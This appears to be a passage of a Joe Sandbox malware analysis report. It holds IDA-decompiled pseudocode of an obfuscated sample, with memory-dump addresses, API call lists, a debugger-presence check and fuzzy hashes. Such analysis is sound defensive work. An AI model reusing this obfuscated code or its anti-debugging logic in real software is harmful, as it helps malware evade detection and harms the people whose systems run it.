                                                                                                                                                                                                                                                    0x010d2a8c
                                                                                                                                                                                                                                                    0x010d2a98
                                                                                                                                                                                                                                                    0x010d2aaa
                                                                                                                                                                                                                                                    0x010d2aad
                                                                                                                                                                                                                                                    0x010d2ab3
                                                                                                                                                                                                                                                    0x010d2ab9
                                                                                                                                                                                                                                                    0x010d2ac5
                                                                                                                                                                                                                                                    0x010d2ad1
                                                                                                                                                                                                                                                    0x010d2adc
                                                                                                                                                                                                                                                    0x010d2ae2
                                                                                                                                                                                                                                                    0x010d2aee
                                                                                                                                                                                                                                                    0x010d2b15
                                                                                                                                                                                                                                                    0x010d2b21
                                                                                                                                                                                                                                                    0x010d2b2d
                                                                                                                                                                                                                                                    0x010d2b2d
                                                                                                                                                                                                                                                    0x010d2da3

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentActCtx.KERNEL32(?), ref: 010D2BD2
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 010D2C8D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateCurrentFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2953019475-0
                                                                                                                                                                                                                                                    • Opcode ID: 6dabe59a5c8bf2476201065a1abbcf9c6e67583d4f2191c27ea9fd60d1e92ff9
                                                                                                                                                                                                                                                    • Instruction ID: 8c6e649b17ce20baabb362676045753631d255ac1832868d5d2e20983baa8380
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dabe59a5c8bf2476201065a1abbcf9c6e67583d4f2191c27ea9fd60d1e92ff9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4602ED70A00209DFEB08CF98D594BAEBBB1FF88304F50C169D959AB795D735AA41CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                                                    			E010D1000() {
                                                                                                                                                                                                                                                    				intOrPtr _t212;
                                                                                                                                                                                                                                                    				intOrPtr _t248;
                                                                                                                                                                                                                                                    				signed int _t249;
                                                                                                                                                                                                                                                    				intOrPtr _t304;
                                                                                                                                                                                                                                                    				intOrPtr _t305;
                                                                                                                                                                                                                                                    				intOrPtr _t319;
                                                                                                                                                                                                                                                    				intOrPtr _t328;
                                                                                                                                                                                                                                                    				intOrPtr _t329;
                                                                                                                                                                                                                                                    				intOrPtr _t336;
                                                                                                                                                                                                                                                    				intOrPtr _t355;
                                                                                                                                                                                                                                                    				intOrPtr _t368;
                                                                                                                                                                                                                                                    				short** _t433;
                                                                                                                                                                                                                                                    				void* _t435;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t433 = _t435 - 0x64;
                                                                                                                                                                                                                                                    				_t433[0x18] = _t433[0x1b];
                                                                                                                                                                                                                                                    				_t433[0x17] = _t433[0x1c] - 0xbd;
                                                                                                                                                                                                                                                    				_t433[0x13] = _t433[0x1c] ^ 0x000003e3;
                                                                                                                                                                                                                                                    				_t433[0x14] = _t433[0x1e] ^ 0x000001fc;
                                                                                                                                                                                                                                                    				_t433[0x15] = _t433[0x1f] ^ 0x0000253b;
                                                                                                                                                                                                                                                    				_t433[0x12] = _t433[0x1c] - 0x1df;
                                                                                                                                                                                                                                                    				_t433[0x16] = _t433[0x1e] ^ 0x00000cc6;
                                                                                                                                                                                                                                                    				if(_t433[0x16] < (_t433[0x13] ^ 0x00000290)) {
                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                    					return  &(_t433[0x13][0xef]);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_t433[0x15] >  &(_t433[0x14][0x17f])) {
                                                                                                                                                                                                                                                    					_t212 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t108 = _t212 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    					if(_t433[0x18] >= ( *_t108 - _t433[0x13] | _t433[0x1d][0x76])) {
                                                                                                                                                                                                                                                    						_t368 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t368 + 0xb4)) >= (_t433[0x17] | _t433[0x1d][0x70] | _t433[0x16])) {
                                                                                                                                                                                                                                                    							 *(_t433 - 8) =  &(_t433[0x12][0x12cc]) ^ 0x00002687;
                                                                                                                                                                                                                                                    							 *(_t433 - 4) = (_t433[0x17] ^ _t433[0x16]) - _t433[0x1d][0x76];
                                                                                                                                                                                                                                                    							 *_t433 = _t433[0x1d][0x5d6e38] ^ _t433[0x1d][0x5c];
                                                                                                                                                                                                                                                    							_t433[1] = (_t433[0x16] | _t433[0x12]) ^ 0x0000283a;
                                                                                                                                                                                                                                                    							_t304 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t305 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t433[2] = ( *(_t304 + 0xc4) & _t433[0x15]) -  *((intOrPtr*)(_t305 + 0xbadbb1));
                                                                                                                                                                                                                                                    							_t433[3] = _t433[0x1d][0x68] -  *0x116d6a0 - _t433[0x1d][0x72];
                                                                                                                                                                                                                                                    							_t433[4] = _t433[0x1d][0x58] &  *0x116d628 ^ _t433[0x1d][0x5d6e32];
                                                                                                                                                                                                                                                    							_t433[5] = _t433[0x1d][0x56] | 0x00002598 | _t433[0x16];
                                                                                                                                                                                                                                                    							WideCharToMultiByte( *(_t433 - 8),  *(_t433 - 4),  *_t433, _t433[1], _t433[2], _t433[3], _t433[4], _t433[5]);
                                                                                                                                                                                                                                                    							 *(_t433 - 0x20) =  &(_t433[0x16][0x136a]);
                                                                                                                                                                                                                                                    							 *(_t433 - 0x1c) = _t433[0x15] + _t433[0x1d][0x5d6e40] & _t433[0x1d][0x5d6e54];
                                                                                                                                                                                                                                                    							 *(_t433 - 0x18) = _t433[0x14] - _t433[0x16];
                                                                                                                                                                                                                                                    							 *(_t433 - 0x14) = _t433[0x14] & _t433[0x18] & 0x000026d4;
                                                                                                                                                                                                                                                    							 *(_t433 - 0x10) = _t433[0x13] * 0x00002801 | 0x000027b9;
                                                                                                                                                                                                                                                    							_t319 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							 *(_t433 - 0xc) =  *(_t319 + 0xbadc29) ^ _t433[0x1d][0x70];
                                                                                                                                                                                                                                                    							CreateFileMappingA( *(_t433 - 0x20),  *(_t433 - 0x1c),  *(_t433 - 0x18),  *(_t433 - 0x14),  *(_t433 - 0x10),  *(_t433 - 0xc));
                                                                                                                                                                                                                                                    							_t248 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t193 = _t248 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                    							 *(_t433 - 0x2c) =  *0x0116D6A8 -  *_t193 | 0x00002598;
                                                                                                                                                                                                                                                    							 *(_t433 - 0x28) = _t433[0x15] - _t433[0x18] - _t433[0x17];
                                                                                                                                                                                                                                                    							_t249 =  *0x116d6cc; // 0x8
                                                                                                                                                                                                                                                    							 *(_t433 - 0x24) = _t249 & _t433[0x16];
                                                                                                                                                                                                                                                    							CreateMutexA( *(_t433 - 0x2c),  *(_t433 - 0x28),  *(_t433 - 0x24));
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t328 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    				_t23 = _t328 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    				_t329 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t329 + 0xac)) = _t433[0x1d][0x20] -  *0x116d68c +  *_t23 + 0x2ec7d0;
                                                                                                                                                                                                                                                    				_t433[0xc] =  &(_t433[0x18][0x45]);
                                                                                                                                                                                                                                                    				_t433[0xd] =  &(_t433[0x18][4]);
                                                                                                                                                                                                                                                    				_t433[0xe] = _t433[0x15] ^ 0x000027b9;
                                                                                                                                                                                                                                                    				_t433[0xf] = _t433[0x1d];
                                                                                                                                                                                                                                                    				_t433[0x10] = _t433[0x15] ^ 0x000026d4;
                                                                                                                                                                                                                                                    				_t433[0x11] = _t433[0x18] ^ 0x000003ec;
                                                                                                                                                                                                                                                    				_push(_t433[0x11]);
                                                                                                                                                                                                                                                    				_t433[0x17] = E010E8330(_t433[0xc], _t433[0xd], _t433[0xe], _t433[0xf], _t433[0x10]);
                                                                                                                                                                                                                                                    				_t433[0x18] = _t433[0x18] ^ 0x0000031f;
                                                                                                                                                                                                                                                    				_t336 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    				_t433[0x1d][0x60] = ( *(_t336 + 0xbadbfd) ^ _t433[0x1d][0x1c]) + _t433[0x1d][0x60] - 0x114023;
                                                                                                                                                                                                                                                    				if(_t433[0x1d][0x6e] == _t433[0x1d][0x70]) {
                                                                                                                                                                                                                                                    					_t433[0x1d][0x20] = _t433[0x1d][0x76] - _t433[0x1d][0xa] ^ _t433[0x1d][0x20];
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(0x116d6a8)) =  *((intOrPtr*)(0x116d6a8)) - (_t433[0x1d][0x76] - _t433[0x1d][0x58] ^ 0x000a4f8c);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t433[6] = _t433[0x13] + 0x2b3;
                                                                                                                                                                                                                                                    				_t433[7] = _t433[0x12] ^ 0x0000032e;
                                                                                                                                                                                                                                                    				_t433[8] = 0x116d5f0;
                                                                                                                                                                                                                                                    				_t433[9] = _t433[0x18] - 0x122;
                                                                                                                                                                                                                                                    				_t433[0xa] =  &(_t433[0x17][0x61]);
                                                                                                                                                                                                                                                    				_t433[0xb] = _t433[0x15] + 0x2565;
                                                                                                                                                                                                                                                    				_t433[0x17] = E010D3250(_t433[6], _t433[7], _t433[8], _t433[9], _t433[0xa], _t433[0xb]);
                                                                                                                                                                                                                                                    				_t433[0x17] =  &(_t433[0x17][0x6a]);
                                                                                                                                                                                                                                                    				_t433[0x14] = _t433[0x14] ^ 0x0000005e;
                                                                                                                                                                                                                                                    				if(_t433[0x1d][0x3a] != _t433[0x1d][0x5d6dee]) {
                                                                                                                                                                                                                                                    					_t355 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t107 = _t355 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                    					 *0x116d60c =  *_t107 + 0x32e9448;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                    0x010d1001
                                                                                                                                                                                                                                                    0x010d100f
                                                                                                                                                                                                                                                    0x010d101b
                                                                                                                                                                                                                                                    0x010d1027
                                                                                                                                                                                                                                                    0x010d1032
                                                                                                                                                                                                                                                    0x010d103e
                                                                                                                                                                                                                                                    0x010d104a
                                                                                                                                                                                                                                                    0x010d1055
                                                                                                                                                                                                                                                    0x010d1064
                                                                                                                                                                                                                                                    0x010d14ad
                                                                                                                                                                                                                                                    0x010d14bc
                                                                                                                                                                                                                                                    0x010d14bc
                                                                                                                                                                                                                                                    0x010d1076
                                                                                                                                                                                                                                                    0x010d1286
                                                                                                                                                                                                                                                    0x010d128b
                                                                                                                                                                                                                                                    0x010d12a0
                                                                                                                                                                                                                                                    0x010d12b5
                                                                                                                                                                                                                                                    0x010d12c1
                                                                                                                                                                                                                                                    0x010d12d4
                                                                                                                                                                                                                                                    0x010d12e6
                                                                                                                                                                                                                                                    0x010d130d
                                                                                                                                                                                                                                                    0x010d131c
                                                                                                                                                                                                                                                    0x010d1327
                                                                                                                                                                                                                                                    0x010d133e
                                                                                                                                                                                                                                                    0x010d1348
                                                                                                                                                                                                                                                    0x010d136c
                                                                                                                                                                                                                                                    0x010d1390
                                                                                                                                                                                                                                                    0x010d13a4
                                                                                                                                                                                                                                                    0x010d13c7
                                                                                                                                                                                                                                                    0x010d13d5
                                                                                                                                                                                                                                                    0x010d13ff
                                                                                                                                                                                                                                                    0x010d1408
                                                                                                                                                                                                                                                    0x010d1417
                                                                                                                                                                                                                                                    0x010d1427
                                                                                                                                                                                                                                                    0x010d1431
                                                                                                                                                                                                                                                    0x010d1444
                                                                                                                                                                                                                                                    0x010d145f
                                                                                                                                                                                                                                                    0x010d146d
                                                                                                                                                                                                                                                    0x010d1478
                                                                                                                                                                                                                                                    0x010d1481
                                                                                                                                                                                                                                                    0x010d148d
                                                                                                                                                                                                                                                    0x010d1490
                                                                                                                                                                                                                                                    0x010d1498
                                                                                                                                                                                                                                                    0x010d14a7
                                                                                                                                                                                                                                                    0x010d14a7
                                                                                                                                                                                                                                                    0x010d12c1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010d12a0
                                                                                                                                                                                                                                                    0x010d1091
                                                                                                                                                                                                                                                    0x010d1097
                                                                                                                                                                                                                                                    0x010d10a4
                                                                                                                                                                                                                                                    0x010d10aa
                                                                                                                                                                                                                                                    0x010d10b9
                                                                                                                                                                                                                                                    0x010d10c2
                                                                                                                                                                                                                                                    0x010d10ce
                                                                                                                                                                                                                                                    0x010d10d4
                                                                                                                                                                                                                                                    0x010d10df
                                                                                                                                                                                                                                                    0x010d10eb
                                                                                                                                                                                                                                                    0x010d10f1
                                                                                                                                                                                                                                                    0x010d110e
                                                                                                                                                                                                                                                    0x010d111a
                                                                                                                                                                                                                                                    0x010d1125
                                                                                                                                                                                                                                                    0x010d1148
                                                                                                                                                                                                                                                    0x010d1160
                                                                                                                                                                                                                                                    0x010d11cc
                                                                                                                                                                                                                                                    0x010d1162
                                                                                                                                                                                                                                                    0x010d1192
                                                                                                                                                                                                                                                    0x010d1192
                                                                                                                                                                                                                                                    0x010d11d9
                                                                                                                                                                                                                                                    0x010d11e5
                                                                                                                                                                                                                                                    0x010d11e8
                                                                                                                                                                                                                                                    0x010d11f7
                                                                                                                                                                                                                                                    0x010d1203
                                                                                                                                                                                                                                                    0x010d120f
                                                                                                                                                                                                                                                    0x010d1232
                                                                                                                                                                                                                                                    0x010d123d
                                                                                                                                                                                                                                                    0x010d1246
                                                                                                                                                                                                                                                    0x010d1267
                                                                                                                                                                                                                                                    0x010d1269
                                                                                                                                                                                                                                                    0x010d126f
                                                                                                                                                                                                                                                    0x010d127b
                                                                                                                                                                                                                                                    0x010d127b
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?), ref: 010D13C7
                                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32 ref: 010D145F
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(?,?,?), ref: 010D14A7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Create$ByteCharFileMappingMultiMutexWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 960205867-0
                                                                                                                                                                                                                                                    • Opcode ID: 0b2dd247a4acffde8deb07ecbb7b88ef2d3e22be609cd7be277f3de811887f76
                                                                                                                                                                                                                                                    • Instruction ID: 9ec583c691ae515567c479e8e32bc151baf14f1d16d6c6d1876fe4ff08b39995
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b2dd247a4acffde8deb07ecbb7b88ef2d3e22be609cd7be277f3de811887f76
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF10475600148CFDB18CFA9D594AAA7BF6FF88304F548269EA198B395C735EC42CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                    			E010D95A0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4, char _a8, char _a12) {
                                                                                                                                                                                                                                                    				char _v0;
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v524;
                                                                                                                                                                                                                                                    				intOrPtr _v528;
                                                                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                                                                                                                    				intOrPtr _v540;
                                                                                                                                                                                                                                                    				intOrPtr _v544;
                                                                                                                                                                                                                                                    				intOrPtr _v548;
                                                                                                                                                                                                                                                    				intOrPtr _v552;
                                                                                                                                                                                                                                                    				intOrPtr _v556;
                                                                                                                                                                                                                                                    				intOrPtr _v560;
                                                                                                                                                                                                                                                    				intOrPtr _v564;
                                                                                                                                                                                                                                                    				intOrPtr _v568;
                                                                                                                                                                                                                                                    				intOrPtr _v572;
                                                                                                                                                                                                                                                    				intOrPtr _v576;
                                                                                                                                                                                                                                                    				intOrPtr _v580;
                                                                                                                                                                                                                                                    				intOrPtr _v584;
                                                                                                                                                                                                                                                    				char _v724;
                                                                                                                                                                                                                                                    				intOrPtr _v792;
                                                                                                                                                                                                                                                    				intOrPtr _v800;
                                                                                                                                                                                                                                                    				char _v804;
                                                                                                                                                                                                                                                    				intOrPtr _v808;
                                                                                                                                                                                                                                                    				char _v812;
                                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                                    				char* _t47;
                                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                                                                                                                    				_t67 = __edi;
                                                                                                                                                                                                                                                    				_t66 = __edx;
                                                                                                                                                                                                                                                    				_t61 = __ebx;
                                                                                                                                                                                                                                                    				_t40 =  *0x116dd74; // 0x2e3e64ca
                                                                                                                                                                                                                                                    				_t41 = _t40 ^ _t70;
                                                                                                                                                                                                                                                    				_v8 = _t40 ^ _t70;
                                                                                                                                                                                                                                                    				if(_a4 != 0xffffffff) {
                                                                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                                                                    					E010DDF2A(_t41);
                                                                                                                                                                                                                                                    					_pop(_t62);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E010DF070(_t67,  &_v804, 0, 0x50);
                                                                                                                                                                                                                                                    				E010DF070(_t67,  &_v724, 0, 0x2cc);
                                                                                                                                                                                                                                                    				_v812 =  &_v804;
                                                                                                                                                                                                                                                    				_t47 =  &_v724;
                                                                                                                                                                                                                                                    				_v808 = _t47;
                                                                                                                                                                                                                                                    				_v548 = _t47;
                                                                                                                                                                                                                                                    				_v552 = _t62;
                                                                                                                                                                                                                                                    				_v556 = _t66;
                                                                                                                                                                                                                                                    				_v560 = _t61;
                                                                                                                                                                                                                                                    				_v564 = _t69;
                                                                                                                                                                                                                                                    				_v568 = _t67;
                                                                                                                                                                                                                                                    				_v524 = ss;
                                                                                                                                                                                                                                                    				_v536 = cs;
                                                                                                                                                                                                                                                    				_v572 = ds;
                                                                                                                                                                                                                                                    				_v576 = es;
                                                                                                                                                                                                                                                    				_v580 = fs;
                                                                                                                                                                                                                                                    				_v584 = gs;
                                                                                                                                                                                                                                                    				asm("pushfd");
                                                                                                                                                                                                                                                    				_pop( *_t22);
                                                                                                                                                                                                                                                    				_t23 =  &_v0; // 0x15ff5756
                                                                                                                                                                                                                                                    				_v540 =  *_t23;
                                                                                                                                                                                                                                                    				_t25 =  &_v0; // 0x10d9cb7
                                                                                                                                                                                                                                                    				_t49 = _t25;
                                                                                                                                                                                                                                                    				_v528 = _t49;
                                                                                                                                                                                                                                                    				_v724 = 0x10001;
                                                                                                                                                                                                                                                    				_t28 = _t49 - 4; // 0x53ff8bcc
                                                                                                                                                                                                                                                    				_v544 =  *_t28;
                                                                                                                                                                                                                                                    				_t30 =  &_a8; // 0xdb33f08b
                                                                                                                                                                                                                                                    				_v804 =  *_t30;
                                                                                                                                                                                                                                                    				_t32 =  &_a12; // 0x16d70ca1
                                                                                                                                                                                                                                                    				_v800 =  *_t32;
                                                                                                                                                                                                                                                    				_t34 =  &_v0; // 0x15ff5756
                                                                                                                                                                                                                                                    				_v792 =  *_t34;
                                                                                                                                                                                                                                                    				_t68 = IsDebuggerPresent();
                                                                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                    				_t36 =  &_v812; // 0x10d998b
                                                                                                                                                                                                                                                    				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                                                                                                                                                                                                    					_t38 =  &_a4; // 0x10e9064
                                                                                                                                                                                                                                                    					_push( *_t38);
                                                                                                                                                                                                                                                    					E010DDF2A(_t57);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t39 =  &_v8; // 0x987
                                                                                                                                                                                                                                                    				return E010DDC5F( *_t39 ^ _t70);
                                                                                                                                                                                                                                                    			}





































                                                                                                                                                                                                                                                    0x010d95a0
                                                                                                                                                                                                                                                    0x010d95a0
                                                                                                                                                                                                                                                    0x010d95a0
                                                                                                                                                                                                                                                    0x010d95a0
                                                                                                                                                                                                                                                    0x010d95ab
                                                                                                                                                                                                                                                    0x010d95b0
                                                                                                                                                                                                                                                    0x010d95b2
                                                                                                                                                                                                                                                    0x010d95ba
                                                                                                                                                                                                                                                    0x010d95bc
                                                                                                                                                                                                                                                    0x010d95bf
                                                                                                                                                                                                                                                    0x010d95c4
                                                                                                                                                                                                                                                    0x010d95c4
                                                                                                                                                                                                                                                    0x010d95d0
                                                                                                                                                                                                                                                    0x010d95e3
                                                                                                                                                                                                                                                    0x010d95f1
                                                                                                                                                                                                                                                    0x010d95f7
                                                                                                                                                                                                                                                    0x010d95fd
                                                                                                                                                                                                                                                    0x010d9603
                                                                                                                                                                                                                                                    0x010d9609
                                                                                                                                                                                                                                                    0x010d960f
                                                                                                                                                                                                                                                    0x010d9615
                                                                                                                                                                                                                                                    0x010d961b
                                                                                                                                                                                                                                                    0x010d9621
                                                                                                                                                                                                                                                    0x010d9627
                                                                                                                                                                                                                                                    0x010d962e
                                                                                                                                                                                                                                                    0x010d9635
                                                                                                                                                                                                                                                    0x010d963c
                                                                                                                                                                                                                                                    0x010d9643
                                                                                                                                                                                                                                                    0x010d964a
                                                                                                                                                                                                                                                    0x010d9651
                                                                                                                                                                                                                                                    0x010d9652
                                                                                                                                                                                                                                                    0x010d9658
                                                                                                                                                                                                                                                    0x010d965b
                                                                                                                                                                                                                                                    0x010d9661
                                                                                                                                                                                                                                                    0x010d9661
                                                                                                                                                                                                                                                    0x010d9664
                                                                                                                                                                                                                                                    0x010d966a
                                                                                                                                                                                                                                                    0x010d9674
                                                                                                                                                                                                                                                    0x010d9677
                                                                                                                                                                                                                                                    0x010d967d
                                                                                                                                                                                                                                                    0x010d9680
                                                                                                                                                                                                                                                    0x010d9686
                                                                                                                                                                                                                                                    0x010d9689
                                                                                                                                                                                                                                                    0x010d968f
                                                                                                                                                                                                                                                    0x010d9692
                                                                                                                                                                                                                                                    0x010d96a0
                                                                                                                                                                                                                                                    0x010d96a2
                                                                                                                                                                                                                                                    0x010d96a8
                                                                                                                                                                                                                                                    0x010d96b7
                                                                                                                                                                                                                                                    0x010d96c3
                                                                                                                                                                                                                                                    0x010d96c3
                                                                                                                                                                                                                                                    0x010d96c6
                                                                                                                                                                                                                                                    0x010d96cb
                                                                                                                                                                                                                                                    0x010d96cc
                                                                                                                                                                                                                                                    0x010d96da

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 010D9698
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 010D96A2
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(010D998B,?,?,?,?,?,00000000), ref: 010D96AF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                    • Opcode ID: 978212669da42ac68319b1dde0d8be170470296cb6c496b3dc0d248fc14c6d69
                                                                                                                                                                                                                                                    • Instruction ID: bcb476cee7b98afb89ddf9838b196b5d8334cb94953da869dd3501b3ff7ecac9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 978212669da42ac68319b1dde0d8be170470296cb6c496b3dc0d248fc14c6d69
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0131B5759013199BCB61EF68D8887DDBBB4BF18310F5041EAE45CA7290E7749B858F44
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DC1C9(int _a4) {
                                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(E010DAAF2(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                    					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E010DC24E(_t14, _t16, _a4);
                                                                                                                                                                                                                                                    				ExitProcess(_a4);
                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                    0x010dc1d5
                                                                                                                                                                                                                                                    0x010dc1f1
                                                                                                                                                                                                                                                    0x010dc1f1
                                                                                                                                                                                                                                                    0x010dc1fa
                                                                                                                                                                                                                                                    0x010dc203

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(010DA67C,?,010DC19F,010DA67C,0112A700,0000000C,010DC2F6,010DA67C,00000002,00000000,?,010DA67C), ref: 010DC1EA
